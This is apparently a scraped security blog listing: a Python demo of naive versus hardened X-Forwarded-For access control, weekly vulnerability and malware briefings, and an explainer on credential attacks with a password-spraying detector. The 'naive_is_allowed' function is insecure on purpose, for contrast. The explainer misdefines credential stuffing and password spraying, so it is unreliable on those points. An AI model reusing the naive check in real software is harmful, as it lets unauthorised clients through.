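ALLOWED_CLIENTS = [ipaddress.ip_network("203.0.113.0/24")]


def _in(nets, ip):
    return any(ip in n for n in nets)


def naive_is_allowed(peer_ip, headers):
    """The fragile pattern: believe X-Forwarded-For from anyone, and when it is
    missing fall back to the socket peer, with the proxy tier itself on the
    allow-list because internal traffic also arrives directly. Stripping the
    header (what CVE-2022-31813 lets a client do) then admits any request."""
    xff = (headers or {}).get("X-Forwarded-For")
    ip = ipaddress.ip_address(xff.split(",")[0].strip() if xff else peer_ip)
    return _in(ALLOWED_CLIENTS + TRUSTED_PROXIES, ip)


def client_ip(peer_ip, headers):
    """Resolve the real client address for an IP-based access decision.

    - If the TCP peer is not a trusted proxy, the peer *is* the client and any
      X-Forwarded-For it sent is ignored (the client controls that header).
    - If the peer is a trusted proxy, walk X-Forwarded-For from the right and
      take the first hop that is not itself a trusted proxy.
    - A proxy connection with no X-Forwarded-For is an error: never substitute
      the proxy's own address for the client's.
    """
    peer = ipaddress.ip_address(peer_ip)
    if not _in(TRUSTED_PROXIES, peer):
        return peer
    xff = (headers or {}).get("X-Forwarded-For")
    if not xff:
        raise ValueError("trusted proxy sent no X-Forwarded-For")
    for hop in reversed([h.strip() for h in xff.split(",")]):
        addr = ipaddress.ip_address(hop)        # raises ValueError on garbage
        if not _in(TRUSTED_PROXIES, addr):
            return addr
    raise ValueError("X-Forwarded-For contains only trusted proxies")


def hardened_is_allowed(peer_ip, headers):
    """Fail closed on anything client_ip() cannot resolve."""
    try:
        return _in(ALLOWED_CLIENTS, client_ip(peer_ip, headers))
    except ValueError:
        return False


if __name__ == "__main__":
    cases = {
        "direct client, spoofed XFF": ("198.51.100.9", {"X-Forwarded-For": "203.0.113.5"}),
        "via proxy, XFF present": ("10.0.0.5", {"X-Forwarded-For": "203.0.113.5"}),
        "via proxy, XFF stripped": ("10.0.0.5", {}),
    }
    for name, (peer, hdrs) in cases.items():
        print(f"{name:28} naive={naive_is_allowed(peer, hdrs)!s:5} "
              f"hardened={hardened_is_allowed(peer, hdrs)}")
```

The third case is the one the Apache advisory is about: the proxy reaches the backend but the forwarded headers are gone, and a resolver that falls back to the peer address quietly authenticates the proxy instead of the client. Failing closed there costs a few legitimate requests during a proxy misconfiguration, which is the right trade.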
August 5, 2022
Blockchain
The 3 posts about Blockchain that you have to read
Continuing our series of posts on the most read content for each technology, this week we stop at Blockchain to learn more about it together with our experts at Telefónica Tech. Here we go!

The 7 priorities of a company when adopting Blockchain. This technology has been attracting the attention of all companies for some time now. Do you want to know why? (Blockchain, October 24, 2022)

5 key trends for the massive adoption of Blockchain. Yes, Blockchain has become one of the keys to the technology market, and we tell you the main trends for its adoption. (Blockchain, July 28, 2022)

Incentives in enterprise blockchain networks: a new approach. This technology does not stop evolving, and new approaches have already arrived. Do you want to be the first to know about them? (Blockchain, January 16, 2023)
August 2, 2022
Cyber Security
Cyber Security Weekly Briefing, 23-29 July
New Critical Vulnerability in SonicWall Products

Researchers at DBappSecurity HAT Lab have discovered a critical vulnerability affecting several SonicWall Analytics On-Prem and SonicWall Global Management System (GMS) products. The SQL injection flaw, tracked as CVE-2022-22280 (CVSS 9.4), gives an attacker access to sensitive information and the ability to bypass authentication and delete information from the databases. It is rated critical because it requires neither authentication nor user interaction and is not complex to exploit. So far, no active exploitation or public exploit has been observed. The vulnerability affects Analytics On-Prem versions 2.5.0.3-2520 and earlier [1] and GMS versions 9.3.1-SP2-Hotfix1 and earlier [2]. SonicWall urges all organisations using these products to install the security patch as soon as possible.

[1] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-analytics-on-prem-sql-injection-vulnerability/220613083254037/
[2] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-gms-sql-injection-vulnerability/220613083124303/

More info: https://www.bleepingcomputer.com/news/security/sonicwall-patch-critical-sql-injection-bug-immediately/

Analysis of new CosmicStrand rootkit

Researchers at Kaspersky's Securelist have discovered a new advanced UEFI firmware rootkit for Windows, named CosmicStrand. This type of malware is highly evasive and persistent, since it survives on the victim's system across reboots. As for the infection chain, CosmicStrand operates at kernel level and targets firmware images from Gigabyte and ASUS motherboards: the images are modified in the CSMCORE DXE driver so that a chain of code runs during system boot, ending with a payload being downloaded and executed within Windows.
According to the researchers, the firmware modifications could have been made by exploiting a vulnerability, which would imply that the attackers had prior access to the victim's computer to extract, modify and overwrite the motherboard firmware. Victims identified so far are located in China, Vietnam and Iran, and are mostly individual users running free versions of the products concerned.

More info: https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/

0-day vulnerability in PrestaShop exploited against e-commerce stores

Exploitation of a 0-day vulnerability has been detected in PrestaShop, the most popular open source e-commerce platform in Europe and Latin America, used by around 300,000 shops worldwide. PrestaShop reported that attackers were chaining vulnerabilities to inject malicious code into websites running its software, allowing them to execute arbitrary code with the aim of stealing customers' payment information. Among the exploited flaws, the PrestaShop team identified a SQL injection 0-day (CVE-2022-36408 [1]) that has been fixed in version 1.7.8.7, although it warns that there may be other ways to carry out the attack. PrestaShop has also published a series of checks to detect whether a shop has been attacked, as well as recommendations to keep it secure, such as keeping the software up to date and disabling the MySQL Smarty cache feature, which the attackers used to carry out the attacks.

[1] https://nvd.nist.gov/vuln/detail/CVE-2022-36408

More info: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/
July 29, 2022
Cyber Security
Cyber Security Weekly Briefing, 16 — 22 July
Lightning Framework: new malware targeting Linux environments

Researchers at Intezer have published information about a new malware family targeting Linux environments, which they have named Lightning Framework. Although the researchers have not obtained a complete sample and some details of the malware are still unknown, several of its features have been analysed. It is an advanced piece of malware that installs itself on the victim's system via a downloader that fetches all of its modules and plugins. From there, the malware masquerades as the GNOME password manager to connect to a polymorphic command-and-control server and download further components. Other features include manipulation of timestamps and process IDs, persistence via a script named "elastisearch", and a backdoor implemented by running its own SSH server. According to BleepingComputer, Lightning Framework is the latest in a growing wave of malware targeting Linux systems, following the recent discoveries of OrBit, Symbiote, BPFDoor and Syslogk.

More info →

* * *

Cisco fixes multiple vulnerabilities

Cisco has released security patches for 45 vulnerabilities (three critical, one high and 41 medium) affecting various products. Three of the patched flaws, CVE-2022-20857, CVE-2022-20858 and CVE-2022-20861, all with CVSS 9.8, affect the Cisco Nexus Dashboard data centre management solution and could allow an unauthenticated remote attacker to execute arbitrary commands and perform actions with root or administrator privileges. Another high-severity flaw, CVE-2022-20860 (CVSS 7.4), lies in the SSL/TLS implementation of Cisco Nexus Dashboard and could allow an unauthenticated remote attacker to intercept and alter communications in a man-in-the-middle attack. Although none of these flaws is known to be actively exploited, Cisco urges users of affected devices to apply the patches as soon as possible.
More info →

* * *

Luna: new ransomware targeting Windows, Linux and ESXi

Kaspersky security researchers have discovered a new ransomware family written in Rust, named Luna, advertised on a ransomware forum on the dark web. It appears to be able to encrypt devices running various operating systems, including Windows, Linux and ESXi. According to Kaspersky, at this stage Luna is a simple ransomware still in development and, for the time being, limited to command-line options. Its encryption scheme is unusual, however, combining X25519 elliptic-curve Diffie-Hellman key exchange (Curve25519) with the Advanced Encryption Standard (AES) symmetric encryption algorithm. The use of a cross-platform language such as Rust reflects the trend of cybercriminal gangs developing ransomware that targets multiple operating systems without much effort or adaptation for each one. No victims of this family are known so far, as its operators were only recently discovered and their activity is still being monitored.

More info →

* * *

Atlassian fixes critical hard-coded credentials flaw in Confluence

Atlassian has released a security update that fixes a critical hard-coded credentials vulnerability in Confluence Server and Data Center that could allow unauthenticated remote attackers to log in to vulnerable servers. The hard-coded password belongs to an account with the username disabledsystemuser, which is created when the Questions for Confluence app (versions 2.7.34, 2.7.35 and 3.0.2) is installed and is intended to help administrators migrate the app's data to Confluence Cloud. The account is created with a hard-coded password and added to the confluence-users group, which by default allows viewing and editing all non-restricted pages within Confluence.
Exploitation of this vulnerability, tracked as CVE-2022-26138, would therefore allow an attacker to log in and access any page the confluence-users group can reach. No active exploitation has been observed so far, and Atlassian says the app, which is intended to improve internal communications, is installed on more than 8,000 Confluence servers. To fix the bug, it is recommended to upgrade to a fixed version (2.7.38 or 3.0.5 and later) or to disable or delete the disabledsystemuser account; uninstalling the Questions for Confluence app is not enough, as the account remains.

More info →

* * *

CloudMensis: New malware targeting macOS

ESET researchers have discovered a new malware being used to backdoor macOS devices and exfiltrate information. First detected by the ESET team in April 2022, it has been named CloudMensis. One of its most notable features is the use of cloud storage services such as Dropbox, Yandex Disk or pCloud to communicate with its command-and-control (C2) servers. CloudMensis executes code on the target system and obtains administrator privileges in order to run a second, more capable stage that collects email attachments, screenshots, documents, keystrokes and other sensitive data. How it is distributed, what the infection vector is, who its ultimate targets are and which threat actor is behind it are all currently unknown.

More info →
July 22, 2022
Cyber Security
Cyber Security Weekly Briefing, 9 — 15 July
Rozena: backdoor distributed by exploiting Follina vulnerability

Fortinet researchers have published an analysis of a malicious campaign distributing a new backdoor by exploiting the well-known Follina vulnerability (CVE-2022-30190). The malware, named Rozena, opens a reverse shell to the attacker's host, allowing the malicious actors to take control of the victim's system, monitor it and capture information, and maintain a backdoor into the compromised system. The infection method consists of distributing malicious Office documents which, when opened, connect to a Discord URL that retrieves an HTML file; that file in turn invokes the vulnerable Microsoft Windows Support Diagnostic Tool (MSDT), resulting in the download of the payload that contains Rozena.

More info →

* * *

Microsoft fixes an actively exploited 0-day

Microsoft has published its security bulletin for July, fixing a total of 84 vulnerabilities, including one actively exploited 0-day. Of the total, 5 are denial of service vulnerabilities, 11 information disclosure, 4 security feature bypass, 52 elevation of privilege and 12 remote code execution. The last category includes the four vulnerabilities rated critical (CVE-2022-30221, CVE-2022-22029, CVE-2022-22039 and CVE-2022-22038); the rest are rated important. The 0-day, CVE-2022-22047 (CVSSv3 7.8), discovered by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC), is an elevation of privilege vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS) that could allow an attacker to gain SYSTEM privileges.
According to Microsoft, active exploitation of this flaw has been detected [6], although no further details have been provided so far, and it is recommended that patches be applied as soon as possible. Also, CISA has added this vulnerability to its catalogue of actively exploited vulnerabilities. More info → * * * Vulnerability in the authentication of an AWS Kubernetes component Security researcher Gafnit Amiga has discovered several security flaws in the authentication process of AWS IAM Authenticator, a component for Kubernetes used by Amazon Elastic Kubernetes Service (EKS). The flaw lies in incorrect validation of query parameters within the authenticator plugin when configuring the use of the template's "AccessKeyID" parameter within query strings. Exploiting it could allow an attacker to bypass existing protection against replay attacks or obtain the highest permissions in the cluster by impersonating other identities, i.e., escalate privileges within the Kubernetes cluster. According to the researcher, two of the identified flaws have existed since the first release in 2017, while the third, which is the one that allows impersonation, has been exploitable since September 2020. The flaws as a whole have been identified as CVE-2022-2385 and have been given a high criticality. AWS has confirmed that since 28 June all EKS clusters have been updated with a new version of IAM Authenticator that fixes the issue. Customers who manage their own clusters and use the "AccessKeyID" parameter of the authenticator plugin should upgrade to AWS IAM Authenticator for Kubernetes version 0.5.0. More info → * * * VMware fixes vCenter Server vulnerability VMware has recently published a new version of vCenter Server 7.0 3f in which it corrects, eight months later, a vulnerability in the integrated authentication mechanism with Windows discovered by Crowdstrike and with CVE-2021-22048. 
This flaw can only be exploited from the same physical or logical network as the affected server, and although it is a complex attack, it requires few privileges and no user interaction. However, NIST suggests that it could be exploited remotely. The versions of vCenter Server affected by the vulnerability are 6.5, 6.7 and 7.0. The company has provided mitigation measures for those who are unable to upgrade to the latest patched version by switching to an Active Directory over LDAP authentication model. CVE-2021-22048 also affects WMware Cloud Foundation versions 3 and 4 but has not yet been fixed. More info → * * * Phishing campaign via Anubis Network Portuguese media outlet Segurança Informatica has published details of a new wave of the persistent phishing campaign, which uses the Anubis Network portal to set up its attacks and has been active since March 2022. Affected users, mainly in Portugal and Brazil, receive smishing or phishing messages from financial services where users are forced to enter their phone number and PIN number, only to be redirected to banking pages where they are asked for their login credentials. According to the researchers, the Command & Control server, hosted by Anubis Network, is controlled by around 80 operators. The analysis also shows how Anubis provides facilities for tracking user data, fake domains created to impersonate banks and temporary email addresses that operators can set up for each case. More info →
July 15, 2022
Cyber Security
Cyber Security Weekly Briefing, 25 June – 1 July
Kaspersky investigates attacks on industrial control systems

Kaspersky researchers have investigated an attack campaign targeting the industrial control systems (ICS) of telecommunications and industrial companies in several Asian countries. According to the researchers, most of the incidents analysed had as their entry vector the exploitation of CVE-2021-26855, a vulnerability in Microsoft Exchange servers that allows remote code execution. The campaign began in October 2021 and has since used the backdoor known as ShadowPad, which masquerades as a legitimate DLL in order to be executed on the infected computer. Once a system is infected, the threat actors remotely inject Cobalt Strike beacons and gain control of a building's automation systems, including electricity, fire control, security and more. From there they spread across the internal network using an account whose credentials have been stolen, gaining access to further internal services and to more sensitive and confidential information. The attackers' ultimate goals remain unknown, although they are believed to be gathering information.

Backdoor targeting governments and organisations around the world discovered

Kaspersky security researchers have revealed that threat actors have been using malware named SessionManager, discovered on Microsoft Exchange servers belonging to government and military organisations in Europe, the Middle East, Asia and Africa. SessionManager is a natively coded malicious module for Microsoft's Internet Information Services (IIS) web server, which the researchers found while continuing to hunt for IIS backdoors similar to Owowa, another malicious IIS module that attackers have deployed on Microsoft Exchange Outlook Web Access servers since late 2020 to steal Exchange credentials. The SessionManager backdoor allows threat actors to maintain persistent, update-resistant and fairly stealthy access to a target organisation's IT infrastructure, through which they can read company email, extend their access by installing further malware, or covertly manage the compromised servers, which can then be leveraged as malicious infrastructure. Given the similarity of the victims and the use of a common OwlProxy variant, the researchers believe the malicious IIS module may have been used by the threat actor Gelsemium as part of a global espionage operation.

0-day in Mitel devices used for ransomware attack

Researchers at CrowdStrike have analysed an incident in which malicious actors reportedly used an exploit for a 0-day vulnerability affecting Mitel MiVoice VoIP devices to distribute ransomware. The security flaw, now identified as CVE-2022-29499 with a CVSSv3 score of 9.8, is due to insufficient data validation in a diagnostic script, which allows unauthenticated remote attackers to inject commands via specially crafted requests. The vulnerability lies in the Mitel Service Appliance component of MiVoice Connect, used in SA 100, SA 400 and Virtual SA, and makes remote code execution possible. Although no official patch has been released, Mitel addressed it on 19 April 2022 by releasing a remediation script for MiVoice Connect versions 19.2 SP3 and R14.x and earlier. The researchers expect further ransomware deployments using this entry vector and recommend that the fix be applied.

More than 900,000 Kubernetes instances exposed on the Internet

Cyble researchers have conducted an analysis to locate Kubernetes instances exposed on the Internet, using scanning tools and search queries similar to those used by malicious operators. The analysis detected more than 900,000 exposed Kubernetes servers, although not all exposed instances are necessarily vulnerable to attack or expose sensitive data. The most exposed TCP port is 443, with just over one million instances, followed by ports 10250 and 6443. According to Cyble, the vast majority of the exposed instances return HTTP status 403, indicating that the unauthenticated request is forbidden and that the instance cannot be attacked this way. However, a small subset of 799 instances return status 200, and these are fully accessible to external attackers. Even though the number of vulnerable servers is relatively low, a single remotely exploitable vulnerability would be enough to put a much larger number of devices at risk.

FabricScape: vulnerability in Microsoft Service Fabric

Researchers at Palo Alto Networks' Unit 42 have reported a vulnerability in Microsoft Azure Service Fabric that affects containers in Linux clusters. The flaw, CVE-2022-30137 with a CVSSv3 score of 7.6, was discovered and reported to the company in early 2022 and affects a platform widely used to host more than a million applications, some of them highly critical. The vulnerability, named FabricScape, is an arbitrary write caused by a race condition in the Data Collection Agent (DCA) component, which runs as root in Service Fabric. It would allow an attacker to escalate privileges to root, take control of the host node and compromise the entire Service Fabric Linux cluster. The vulnerability was resolved in the June patch for Microsoft Azure Service Fabric 9.0 for all users with automatic updates enabled; those without this feature enabled are advised to upgrade manually to the latest Service Fabric version.
July 2, 2022
Cyber Security
Cyber Security Weekly Briefing, 18 – 24 June
Microsoft Office 365 and Cloudflare services went down worldwide

Multiple web services were interrupted worldwide last Tuesday, caused on the one hand by Microsoft Office 365 and on the other by Cloudflare. In the early hours of Tuesday morning, many users reported problems accessing Microsoft Office 365 services, including Exchange, Teams and SharePoint; Microsoft reported on its official Twitter account that the problems were due to its traffic management infrastructure not working. Meanwhile, Cloudflare also suffered a massive outage yesterday, affecting well-known websites such as Amazon, Telegram, Twitch and GitLab. The origin of this incident was a change in network configuration, made as part of an internal project to increase the resilience of its busiest locations, which affected 19 of its data centres. Both incidents have now been resolved and all services are operating as usual.

Critical vulnerability affecting QNAP NAS devices

QNAP has issued a security advisory about a vulnerability affecting its Network Attached Storage (NAS) devices. According to the manufacturer, some of its server models are vulnerable to attack through a critical PHP vulnerability dating back three years, provided they are not running the default configuration. The vulnerability, identified as CVE-2019-11043 with a CVSSv3 score of 9.8, allows remote code execution in PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11. The company indicates that, for the vulnerability to be exploitable, both Nginx and PHP-FPM must be installed on the NAS. If these conditions are met, the flaw affects the following versions of its operating systems: QTS 5.0.x and later, QTS 4.5.x and later, QuTS hero h5.0.x, QuTS hero h4.5.x and QuTScloud c5.0.x. QNAP advises customers that patches are available in QTS 5.0.1.2034 build 20220515 and later and QuTS hero h5.0.0.0.2069 build 20220614 and later.

Quantum: new tool for creating malicious LNK files

Cyble researchers have identified a new tool for building malicious .LNK files that is increasingly being used in the early stages of attacks. The use of .LNK files carrying malicious code is not new: they have been used to abuse legitimate Windows system tools in malware infections such as Emotet, Bumblebee, Qbot and IcedID. With this new tool, called Quantum, attackers can easily bypass User Account Control or the SmartScreen component, load multiple payloads from a single .LNK, build HTA and ISO files, or execute malware with a delay. Its developers also claim that the generated files evade the corresponding security solutions. Some versions of Quantum also include exploits for the "DogWalk" vulnerability, and Cyble links its use to the well-known APT Lazarus.

Cisco announces it will not fix vulnerability in Small Business RV routers

Cisco has warned users still running Small Business RV routers that it has no plans to fix a new remote code execution vulnerability rated CVSS 9.8. The vulnerability, tracked as CVE-2022-20825, is the result of insufficient validation of HTTP packets on the Small Business RV110W Wireless-N VPN Firewall, RV130 VPN, RV130W Wireless-N Multifunction VPN and RV215W Wireless-N VPN routers, and is exploitable when the remote management web interface is enabled on WAN connections. Despite the severity of the flaw, the company has stated that there will be no patch, as these devices are out of support, and that the only possible mitigation is to disable the remote management interface. Cisco therefore recommends that users migrate to the Cisco Small Business RV132W, RV160 and RV160W routers.

Critical vulnerability in TheHive and Cortex

Security firm StrangeBee has issued a security advisory about a critical authentication bypass vulnerability discovered in TheHive and Cortex. TheHive is an open-source security incident response platform widely used by companies around the world, while Cortex is an independent analysis engine, also developed by StrangeBee. The vulnerability, discovered by Przemysław Mazurek, allows any account on the platform to be impersonated, including administrator accounts, as long as the Active Directory (AD) authentication module is enabled and used to authenticate users. The cause is that AD accepts anonymous connections (anonymous binds): if an authentication request for an existing account is sent without a password via the TheHive/Cortex API, AD's response to the request allows authentication as "anonymous". The vulnerability, which does not yet have an identifier, affects TheHive versions 3 to 5 and Cortex 3, so upgrading to the latest version as soon as possible is recommended.
June 24, 2022
Cyber Security
Attacking login credentials
An access credential is basically a username and password associated with a person, together with the access permissions granted to that person for an application, service or system. A user certificate, or any other form or method of authentication used to grant access to a resource such as an application, web page or service, can also be considered an access credential.

Access credentials are used daily by all kinds of users, from ICT experts to people unaccustomed to new technologies. This makes them a target for cybercriminals, who need these credentials to achieve their goals. Crimes aimed at obtaining access credentials grow every year, with new techniques and mechanisms implemented to try to obtain them. Access credentials are essential to protecting an organisation's information and personal data, so it is important to be clear about which attacks focus on obtaining them and what mechanisms and techniques they employ.

Attacks on passwords

One of the most common password attacks is brute force, which consists of guessing the password by trial and error. This method starts by trying different combinations built from personal data, data collected by other means, or random data. These actions are automated with tools that facilitate the task and the search.

Dictionary attacks are another type of password attack. They exploit the bad practice of using a word as a password. As with brute-force attacks, tools are used to automate the search. A dictionary attack uses dictionaries: text files containing words and character strings commonly used as passwords. There are many dictionaries on the internet, such as the widely used rockyou.txt.

If the attack is heavily targeted at a specific person, information about the victim is also usually collected, such as dates of birth, names of family members, pets or places where the victim has lived. A customised dictionary is then created with these and similar combinations, taking advantage of the bad practice of using passwords based on personal data or likes and dislikes.

What can be done to prevent passwords from being vulnerable to these attacks? Create strong passwords that meet the following guidelines:

- At least 10 to 12 characters, combining different types of characters (upper case, lower case, numbers and symbols).
- The following should not be used: simple words in any language (dictionary words); personal names, dates, places or personal data; words made up of characters that are close together on the keyboard; excessively short words.
- Avoid passwords consisting of elements or words that may be public or easily guessable (e.g., name + date of birth).
- Create stronger and more robust passwords, totally different from the others, for critical services or applications.

Common mistakes in the use of passwords

Credential stuffing is a weakness that makes it easier for a brute-force or dictionary attack to succeed. Password spraying is the technique of using a large number of stolen passwords (from a security breach) against a group of accounts (e.g., the webmail accounts of a company's employees) to see whether access can be gained where it is needed. These searches are automated with tools that limit the number of access attempts so as not to trigger the alert systems of the site being attacked.

Here are some actions that can help counter these attacks or make a password less vulnerable to them:

- Do not reuse passwords under any circumstances, especially those used to access critical systems.
- Enable MFA (multi-factor authentication) or 2FA (two-factor authentication) whenever the system being accessed allows it.
- Consider access using factors other than the username/password pair itself, such as: biometric systems (fingerprint, iris, etc.); cryptographic tokens, in software or hardware; coordinate cards; access by OTP (one-time password).
- Avoid using your corporate account and email to register for non-corporate services.

Social engineering

Social engineering attacks focused on obtaining passwords employ a variety of manipulation techniques to obtain information that helps to derive passwords and, in some cases, to obtain credentials directly.

Phishing, smishing, vishing and warshipping

These attacks mainly take advantage of misinformation and human naivety. By various mechanisms and means, they impersonate a trusted party (bank, post office, tax authorities, etc.) in order to request the victim's credentials, using different entry vectors such as emails, SMS, calls or devices.

- Phishing: sending an email with an urgent or eye-catching subject (banking matters, tax office, post office, etc.). The message contains a link or button leading to a website designed to look very similar to the legitimate website of the impersonated entity, where the victim is asked to enter their credentials. These fake websites record the credentials entered, pass them to the attackers and redirect the victim to the genuine website of the spoofed company or organisation. There are several variants of phishing, such as spear-phishing and whaling.
- Smishing: a cybercriminal sends the user an SMS pretending to be a legitimate entity (social network, bank, public institution, etc.) with the same purpose as phishing.
- Vishing: a phone call that applies phishing and social engineering techniques to obtain the user's credentials, as in phishing and smishing.
- Warshipping: a technological gift (usually a USB device or similar) infected with malware that, once connected to our systems, uses different mechanisms to obtain credentials and other data and send them to the cybercriminal. Baiting also fits in this category, where an infected USB device is given away at conferences and conventions, or through websites with pop-up windows, advertised prizes or other lures.

Shoulder surfing

This technique consists of spying on victims as they type in their credentials, either because they are in a public or insecure environment or because of the cybercriminal's skill at perceiving what is typed. In some cases the attacker gains the user's trust by posing as technical or trusted personnel, so that the victim relaxes and enters credentials without fear. It is therefore advisable to be aware of your surroundings and alert to any suspicious activity around you.

Dumpster diving attack

This technique aims to obtain information by searching through the victim's rubbish. Attackers usually look for notes and notebooks that reveal the type of credentials in use, or a credential written down in a note or notebook.

The following guidelines are recommended to protect against social engineering attacks focused on obtaining credentials:

- Use common sense and be cautious at all times.
- Attend digital security awareness and training sessions. The first line of defence is the end user.
- Avoid clicking on links that arrive via SMS or email. Banks, for example, do not send SMS of the type used in these attacks. If you want to access these services and websites, do so through the official channels they offer.
- Use biometric logins such as facial recognition, fingerprint, etc.
- Enable 2FA or MFA on all logins where possible.
- Do not trust gifts from strangers; check them in advance with security software in a secure environment.
- Do not trust any phone call requesting access credentials.

Other attacks on credentials

Other cyber-attacks against credentials use malicious software such as keyloggers. A keylogger is a programme that records everything typed on the computer it has infected. Cybercriminals plant them in advance by infecting the victim's computer via USB, email or any other known attack vector.

Another cyber-attack that may be aimed at obtaining credentials is Man in the Middle. This involves intercepting communication between two or more parties, impersonating either of them as required, in order to view and obtain information and modify it at will. Once communications have been intercepted, the responses received at either end may have been manipulated or may not have come from the legitimate interlocutor. The attacker can therefore use social engineering techniques in these messages, send malicious attachments to install software, or use spoofing techniques to steal the victim's passwords.
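The article notes that password spraying tools keep the number of attempts per account low so that lockout and alerting rules never fire. As an added example (not code from the original article), the script below shows the detection side: it parses constructed authentication log lines and separates a low-and-slow spray (one source, many accounts, few failures each) from a classic per-account brute force. The log format, account names and source addresses are all constructed for illustration.

```python
"""Flag password-spraying behaviour in authentication logs.

A spray looks like a single source failing against many different
accounts while staying below the lockout threshold on every one of
them, so a rule that only counts failures per account never triggers.
Grouping failures by source address exposes the pattern.
"""
import re
from collections import defaultdict

# Constructed sample lines in a simple webmail-style auth log format.
SAMPLE_LOG = """\
2022-06-20T08:00:01 auth FAIL user=alice src=203.0.113.10
2022-06-20T08:00:09 auth FAIL user=bob src=203.0.113.10
2022-06-20T08:00:17 auth FAIL user=carol src=203.0.113.10
2022-06-20T08:00:25 auth FAIL user=dave src=203.0.113.10
2022-06-20T08:00:33 auth FAIL user=erin src=203.0.113.10
2022-06-20T08:00:41 auth FAIL user=frank src=203.0.113.10
2022-06-20T08:00:49 auth OK   user=grace src=203.0.113.10
2022-06-20T08:01:02 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:01:03 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:01:04 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:01:05 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:01:06 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:01:07 auth FAIL user=alice src=198.51.100.7
2022-06-20T08:02:10 auth FAIL user=bob src=192.0.2.55
2022-06-20T08:02:40 auth OK   user=bob src=192.0.2.55
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>FAIL|OK)\s+user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(log_text):
    """Yield (result, user, src) tuples; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("result"), m.group("user"), m.group("src")


def detect(log_text, lockout_threshold=5, min_accounts=5):
    """Return {'spray': [...], 'brute_force': [...]} keyed by source address.

    spray:       a source that failed against >= min_accounts distinct
                 accounts while staying below lockout_threshold failures
                 on every one of them (the low-and-slow pattern).
    brute_force: a source that reached lockout_threshold failures on at
                 least one account (the classic per-account pattern).
    """
    fails = defaultdict(lambda: defaultdict(int))   # src -> user -> count
    successes = defaultdict(set)                     # src -> users logged in
    for result, user, src in parse(log_text):
        if result == "FAIL":
            fails[src][user] += 1
        else:
            successes[src].add(user)

    findings = {"spray": [], "brute_force": []}
    for src, per_user in fails.items():
        max_per_account = max(per_user.values())
        if max_per_account >= lockout_threshold:
            findings["brute_force"].append(src)
        elif len(per_user) >= min_accounts:
            findings["spray"].append({
                "src": src,
                "accounts_tried": len(per_user),
                "max_failures_per_account": max_per_account,
                # a success following the spray is the account to reset first
                "succeeded_as": sorted(successes.get(src, ())),
            })
    return findings


if __name__ == "__main__":
    for kind, items in detect(SAMPLE_LOG).items():
        for item in items:
            print(f"{kind}: {item}")
```

The example illustrates why a per-account lockout counter alone misses the spraying source 203.0.113.10 while catching only the noisy 198.51.100.7.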
June 22, 2022
Cyber Security
Cyber Security Weekly Briefing, 13 – 17 June
Hertzbleed: new side-channel attack on AMD and Intel processors

Security researchers at several US universities have discovered a new side-channel attack affecting Intel and AMD processors, called Hertzbleed. What is remarkable about this attack is that it could allow an attacker to extract cryptographic keys from remote servers. This is because, under certain circumstances, the Dynamic Voltage and Frequency Scaling (DVFS) of modern x86 processors depends on the data being processed, so the same program can run at different CPU frequencies depending on its input. Both Intel (CVE-2022-24436) and AMD (CVE-2022-23823) have acknowledged the vulnerability and issued security advisories. According to the researchers who discovered Hertzbleed, neither firm plans to release patches for these flaws.

PACMAN: new attack against Mac devices

Security researchers at MIT CSAIL have discovered a new attack that could bypass Pointer Authentication (PAC) on Apple's M1 processors. PAC is a security mechanism that cryptographically signs certain pointers so that the operating system can detect and block unexpected changes to them; if such changes go undetected, they could lead to information leaks or system compromise. The attack would allow threat actors to access the file system and execute arbitrary code on vulnerable Macs. To do so, attackers must first find an existing memory read/write flaw in software on the victim's Mac, which PAC would otherwise block; the attack increases that flaw's severity by bypassing pointer authentication. It also requires knowing the PAC value of a particular pointer on the target. The technique was reported to Apple in 2021, along with a proof of concept, although the company indicates that it does not pose an immediate risk to Mac users, as it requires the exploitation of another flaw and cannot bypass the security systems on its own. More info: https://pacmanattack.com/

Citrix fixes two vulnerabilities in ADM

Citrix has released a critical security bulletin fixing two vulnerabilities in Citrix Application Delivery Management (ADM). The first flaw, CVE-2022-27511, is due to improper access control and could allow an attacker to reset the administrator password after a device reboot, allowing SSH access with the default administrator credentials. Citrix has also fixed a second flaw (CVE-2022-27512) which, if exploited, could cause a temporary outage of the ADM licence server, leaving Citrix ADM unable to issue new licences or renew existing ones. Both flaws affect Citrix ADM 13.1 before 13.1-21.53 and Citrix ADM 13.0 before 13.0-85.19. The firm urges users to upgrade the Citrix ADM server and Citrix ADM agent as soon as possible.

Microsoft Exchange servers compromised to deploy BlackCat ransomware

The Microsoft 365 Defender threat intelligence team has reported two security incidents in which BlackCat ransomware was deployed. In the first, the exploitation of an unpatched Exchange server was the entry vector. After this initial access, the attackers moved through the affected network, stealing credentials and exfiltrating large amounts of information for use in double extortion; the ransomware was deployed two weeks after initial access. Microsoft has not reported which vulnerability was exploited. The second incident used compromised credentials on an internet-facing remote desktop server as the entry vector, with the attackers subsequently gaining access to passwords and other information and ultimately deploying the BlackCat payload to encrypt data.

Office 365 feature makes it easy to encrypt files in the cloud

